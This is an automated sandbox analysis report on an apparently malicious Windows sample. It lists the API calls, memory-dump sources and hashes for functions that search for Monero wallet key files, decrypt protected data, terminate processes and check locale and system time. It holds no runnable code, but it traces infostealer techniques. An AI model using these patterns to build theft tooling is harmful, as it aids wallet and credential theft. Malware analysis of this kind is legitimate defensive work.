                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00AE0C32), ref: 00ACDF5E
                                      • StrCmpCA.SHLWAPI(?,00AE15C0), ref: 00ACDFAE
                                      • StrCmpCA.SHLWAPI(?,00AE15C4), ref: 00ACDFC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00ACE4E0
                                      • FindClose.KERNEL32(000000FF), ref: 00ACE4F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID: \*.*
                                      • API String ID: 2325840235-1173974218
                                      • Opcode ID: 44678e42a63e0303222093f55a5d6a5b067f3ae04db7834a60323d1a2f4b8c00
                                      • Instruction ID: 6d6ba0fbbc9c4a175a53b56943cdf55bc4c850aa64525a9e3435889602aa299f
                                      • Opcode Fuzzy Hash: 44678e42a63e0303222093f55a5d6a5b067f3ae04db7834a60323d1a2f4b8c00
                                      • Instruction Fuzzy Hash: ADF18C729241189ACB15EB60DEA5EEE7379BF64300F4045DBB04B62291EF306F89CF61
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: *Bk3$+Rw$<Mz]$F1^$`7S$cPg*$er^$er^*oH$nn$ztuw
                                      • API String ID: 0-3128633582
                                      • Opcode ID: 520418ebd58b43a56b597fecf1b003d507d642cdbe2a1466744d2350ff8436bc
                                      • Instruction ID: 0078ba18389d3aae41e10ba40d2de116e4f4412dc52ab3f0fa91b3ef3513bf36
                                      • Opcode Fuzzy Hash: 520418ebd58b43a56b597fecf1b003d507d642cdbe2a1466744d2350ff8436bc
                                      • Instruction Fuzzy Hash: B4B228F3A0C2149FE304AE2DEC8567AF7E9EF94720F16463DEAC5C7744EA3558018692
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00AE15A8,00AE0BAF), ref: 00ACDBEB
                                      • StrCmpCA.SHLWAPI(?,00AE15AC), ref: 00ACDC33
                                      • StrCmpCA.SHLWAPI(?,00AE15B0), ref: 00ACDC49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00ACDECC
                                      • FindClose.KERNEL32(000000FF), ref: 00ACDEDE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: d7c81f47261985695c9b4b235d1dddd70c9b1118ee4cecff5b7ef104cbbf81ed
                                      • Instruction ID: 2d2d59e69898aa75b9871bbbaf6c2f16bff67496402ba441df3cb3c46be9ecef
                                      • Opcode Fuzzy Hash: d7c81f47261985695c9b4b235d1dddd70c9b1118ee4cecff5b7ef104cbbf81ed
                                      • Instruction Fuzzy Hash: A3914772A102189BCB14FB70DE56EED737DAF94340F40466EF84796291EE349B48CB92
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AD9905
                                      • Process32First.KERNEL32(00AC9FDE,00000128), ref: 00AD9919
                                      • Process32Next.KERNEL32(00AC9FDE,00000128), ref: 00AD992E
                                      • StrCmpCA.SHLWAPI(?,00AC9FDE), ref: 00AD9943
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AD995C
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00AD997A
                                      • CloseHandle.KERNEL32(00000000), ref: 00AD9987
                                      • CloseHandle.KERNEL32(00AC9FDE), ref: 00AD9993
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: c19f185db08070b41f5cff2813d25098ce904aed27c88c92addb9e107cbe371d
                                      • Instruction ID: 2c3cc28339e568e0d1323c8b51677cefc47fa8ef2565369222e55575a6c7c08b
                                      • Opcode Fuzzy Hash: c19f185db08070b41f5cff2813d25098ce904aed27c88c92addb9e107cbe371d
                                      • Instruction Fuzzy Hash: AE111F75A14308ABCB24DFA0DC48BDEB778BB48700F00458DF509E6350D7749A84CFA0
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,00AE05B7), ref: 00AD7D71
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00AD7D89
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00AD7D9D
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00AD7DF2
                                      • LocalFree.KERNEL32(00000000), ref: 00AD7EB2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID: /
                                      • API String ID: 3090951853-4001269591
                                      • Opcode ID: 21646119871eda2ba4db3ed3bfa01104c2b35abdac3ba284c2ab0b9b30133cec
                                      • Instruction ID: 5746cfe0446b7b52fea2a61750fd8fee84c34138acd0e2931efd78e1eccf3d19
                                      • Opcode Fuzzy Hash: 21646119871eda2ba4db3ed3bfa01104c2b35abdac3ba284c2ab0b9b30133cec
                                      • Instruction Fuzzy Hash: 39414E71950218ABCB24DB94DD99FEEB774FF58700F1041DAE00AA2290DB746F85CF61
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00AE0D79), ref: 00ACE5A2
                                      • StrCmpCA.SHLWAPI(?,00AE15F0), ref: 00ACE5F2
                                      • StrCmpCA.SHLWAPI(?,00AE15F4), ref: 00ACE608
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00ACECDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 433455689-1173974218
                                      • Opcode ID: d54ebf1e8b192e61f1c343c10ae4069ae65497e971cbfcfb817322de1530d477
                                      • Instruction ID: 597d1eae5f5170ad86fb696d02a86e7c38e5b0b029bf86bb20c1567da99c7180
                                      • Opcode Fuzzy Hash: d54ebf1e8b192e61f1c343c10ae4069ae65497e971cbfcfb817322de1530d477
                                      • Instruction Fuzzy Hash: 9612C172A101189BCB14FB60DEA6EED7379AF64300F4045EBB54B56291EF306F49CB62
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: *]=$0D$7V_$:Vn_$a9m$s K_
                                      • API String ID: 0-3737603074
                                      • Opcode ID: 042a7c7aa71af4829ab7bd8427d3e157a28d5b1ecc0fe48dae4d9ffe0ec6c9f1
                                      • Instruction ID: d67db668bb9ead3de8992f0bac3e99ef4178c45962f3360c52773242e467b553
                                      • Opcode Fuzzy Hash: 042a7c7aa71af4829ab7bd8427d3e157a28d5b1ecc0fe48dae4d9ffe0ec6c9f1
                                      • Instruction Fuzzy Hash: 4BB208F36082049FE304AE2DEC8567AFBE9EF94720F16853DE6C4C7740EA7598058697
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: \u$\u${${$}$}
                                      • API String ID: 0-582841131
                                      • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                      • Instruction ID: 4ebff770ca9003b3ff78ffcf074ef1eb3c9ecf9f53eebc7f9fba8d07c7035ec9
                                      • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                      • Instruction Fuzzy Hash: A5415D12E19BDAC5CB058B7444A02BEBFB26FD6210F6D43EAC49D1F782C774814AD3A5
                                      APIs
                                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00ACC971
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00ACC97C
                                      • lstrcat.KERNEL32(?,00AE0B47), ref: 00ACCA43
                                      • lstrcat.KERNEL32(?,00AE0B4B), ref: 00ACCA57
                                      • lstrcat.KERNEL32(?,00AE0B4E), ref: 00ACCA78
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlen
                                      • String ID:
                                      • API String ID: 189259977-0
                                      • Opcode ID: a306c9f8689dc6fb35c84516cb66d5c639463608de1c656ae7ec40eeea9a6e09
                                      • Instruction ID: 50c184ce4d8d8d2d06f348a36d5f8d59c57aceb86bf039f1b1846d971c96f786
                                      • Opcode Fuzzy Hash: a306c9f8689dc6fb35c84516cb66d5c639463608de1c656ae7ec40eeea9a6e09
                                      • Instruction Fuzzy Hash: EF4167B491431EEBDB10CFA4DD89FEEB7B8BB48344F1045A9E509A7280D7705A84CFA5
                                      APIs
                                      • GetSystemTime.KERNEL32(?), ref: 00AD6C0C
                                      • sscanf.NTDLL ref: 00AD6C39
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00AD6C52
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00AD6C60
                                      • ExitProcess.KERNEL32 ref: 00AD6C7A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID:
                                      • API String ID: 2533653975-0
                                      • Opcode ID: 86181f649e8c06dd9dff64e9e67156a0109d81f15086d227ce827007f3fca576
                                      • Instruction ID: 20d2792278b2526ba2b4dc8f78abd516d70eb2bfb014a144a5feb4e15f761914
                                      • Opcode Fuzzy Hash: 86181f649e8c06dd9dff64e9e67156a0109d81f15086d227ce827007f3fca576
                                      • Instruction Fuzzy Hash: 1721AD75D14209ABCF48DFE4E9459EEB7B9FF48300F04856AF516E3250EB349604CB69
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00AC72AD
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AC72B4
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00AC72E1
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00AC7304
